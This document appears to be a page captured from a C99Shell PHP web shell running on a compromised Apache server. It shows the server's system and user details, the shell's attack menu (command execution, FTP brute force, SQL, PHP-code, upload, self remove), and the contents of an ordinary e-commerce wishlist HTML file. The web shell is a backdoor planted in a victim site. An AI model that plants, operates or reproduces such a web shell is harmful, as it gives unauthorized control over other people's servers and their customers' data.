!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/checkout/   drwxr-xr-x
Free 13.04 GB of 57.97 GB (22.5%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     wishList.php (2.53 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <!--  This file has been downloaded from bootdey.com @bootdey on twitter -->
    <!--  All snippets are MIT license http://bootdey.com/license -->
    <title>Jiff shop Wish List</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="css/wishList.css">
    <script src="https://code.jquery.com/jquery-1.10.2.min.js"></script>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@4.4.1/dist/css/bootstrap.min.css" rel="stylesheet">
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.4.1/dist/js/bootstrap.bundle.min.js"></script>
    <script src='select2/dist/js/select2.min.js' type='text/javascript'></script>

<link href='select2/dist/css/select2.min.css' rel='stylesheet' type='text/css'>
</head>
<body>
<link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css" rel="stylesheet">
<div class="container padding-bottom-3x mb-1">
    <div class="card" style="background-color: #4267B2;color: #fff; margin-top: 5px;">
        <div class="card-body" style="padding: 11px;">
            <div class="float left" style="display: inline-block; max-width:60%;"><span id="shop_name"></span> </div>
            <div class="float-right">Powered By JIFF</div>
        </div>
    </div>
    <!-- Alert-->
    <!-- Shopping Cart-->
    <div class="tab-content clearfix">
        <div class="tab-pane active" id="data_table">
            <div class="table-responsive shopping-cart">
                <table class="table">
                    <tbody id="tdata">
                    </tbody>
                </table>
            </div>

            <div class="shopping-cart-footer">
                <a href="https://web.businesscloud.xyz/checkout/cart.php?id=101115269135931_4486210768174705" id="checkout_a">
                    <div class="column">
                        <div class="button_text float-left">
                           <span>Go To Cart</span>
                        </div>
                        <!-- <div class="button_total float-right" id="button_total">
                        <span id="total_without_shipping">৳0000</span>
                        </div> -->
                    </div>
                </a>
            </div>
        </div>
    </div>
</div>
<script type="text/javascript" src="js/wishList.js"></script>
<script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>

<script type="text/javascript">


</script>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0055 ]--